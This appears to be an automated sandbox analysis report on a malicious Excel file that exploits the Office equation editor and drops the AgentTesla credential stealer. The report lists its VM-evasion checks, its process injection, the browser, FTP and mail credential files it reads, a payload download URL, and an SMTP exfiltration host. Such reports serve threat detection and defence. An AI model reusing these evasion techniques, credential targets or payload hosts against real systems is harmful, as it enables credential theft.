                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: PAGO.xlsxStream path 'EncryptedPackage' entropy: 7.99945669212 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 912, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00F84CAE sldt word ptr [eax]
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9200
                  Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 546
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -420000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2904Thread sleep time: -102988s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2016Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1776Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1776Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2404Thread sleep count: 9200 > 30
                  Source: C:\Users\Public\vbc.exe TID: 2404Thread sleep count: 546 > 30
                  Source: C:\Users\Public\vbc.exe TID: 1776Thread sleep count: 83 > 30
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 102988
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                  Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 912, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.351d880.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.351d880.4.raw.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 912, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY
                  Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.351d880.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.vbc.exe.351d880.4.raw.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Spearphishing Link1Windows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information31Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing2Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion141LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol33Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 383929 Sample: PAGO.xlsx Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 33 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->33 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 39 12 other signatures 2->39 7 EQNEDT32.EXE 13 2->7         started        12 EXCEL.EXE 174 53 2->12         started        process3 dnsIp4 29 wsdysuresbonescagegp.dns.army 103.153.76.181, 49166, 80 TWIDC-AS-APTWIDCLimitedHK unknown 7->29 31 is.gd 104.25.234.53, 443, 49165 CLOUDFLARENETUS United States 7->31 21 C:\Users\user\AppData\...\svchost[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 49 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->49 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$PAGO.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 51 Multi AV Scanner detection for dropped file 14->51 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->53 55 Machine Learning detection for dropped file 14->55 57 2 other signatures 14->57 17 vbc.exe 2 14->17         started        process9 dnsIp10 27 smtp.lpsinvest.com 5.10.29.169, 49167, 587 EVEREST-ASGB United Kingdom 17->27 41 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->41 43 Tries to steal Mail credentials (via file access) 17->43 45 Tries to harvest and steal ftp login credentials 17->45 47 Tries to harvest and steal browser information (history, passwords, etc) 17->47 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PAGO.xlsx33%VirustotalBrowse
                  PAGO.xlsx33%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe100%Joe Sandbox ML
                  C:\Users\Public\vbc.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe17%ReversingLabsWin32.Trojan.AgentTesla
                  C:\Users\Public\vbc.exe17%ReversingLabsWin32.Trojan.AgentTesla

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  wsdysuresbonescagegp.dns.army6%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://smtp.lpsinvest.com0%Avira URL Cloudsafe
                  http://AFplKq.com0%Avira URL Cloudsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://wsdysuresbonescagegp.dns.army/documenpt/svchost.exe100%Avira URL Cloudmalware
                  https://api.ipify.org%0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://x8nMk45g8ETcNqX.org0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  wsdysuresbonescagegp.dns.army
                  103.153.76.181
                  truetrueunknown
                  smtp.lpsinvest.com
                  5.10.29.169
                  truetrue
                    unknown
                    is.gd
                    104.25.234.53
                    truefalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://wsdysuresbonescagegp.dns.army/documenpt/svchost.exetrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://smtp.lpsinvest.comvbc.exe, 00000005.00000002.2369177054.00000000026F4000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://dist.nuget.org/win-x86-commandline/latest/nuget.exevbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.drfalse
                          high
                          https://github.com/d-haxton/HaxtonBot/archive/master.zipvbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.drfalse
                            high
                            http://AFplKq.comvbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://www.%s.comPAvbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zipvbc.exe, svchost[1].exe.2.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2169807116.00000000024B8000.00000004.00000001.sdmpfalse
                                high
                                https://api.ipify.org%vbc.exe, 00000005.00000002.2369077883.0000000002636000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                low
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpfalse
                                  high
                                  https://x8nMk45g8ETcNqX.orgvbc.exe, 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2369171386.00000000026EC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  5.10.29.169
                                  smtp.lpsinvest.comUnited Kingdom
                                  60610EVEREST-ASGBtrue
                                  104.25.234.53
                                  is.gdUnited States
                                  13335CLOUDFLARENETUSfalse
                                  103.153.76.181
                                  wsdysuresbonescagegp.dns.armyunknown
                                  134687TWIDC-AS-APTWIDCLimitedHKtrue

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:383929
                                  Start date:08.04.2021
                                  Start time:12:39:17
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:PAGO.xlsx
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
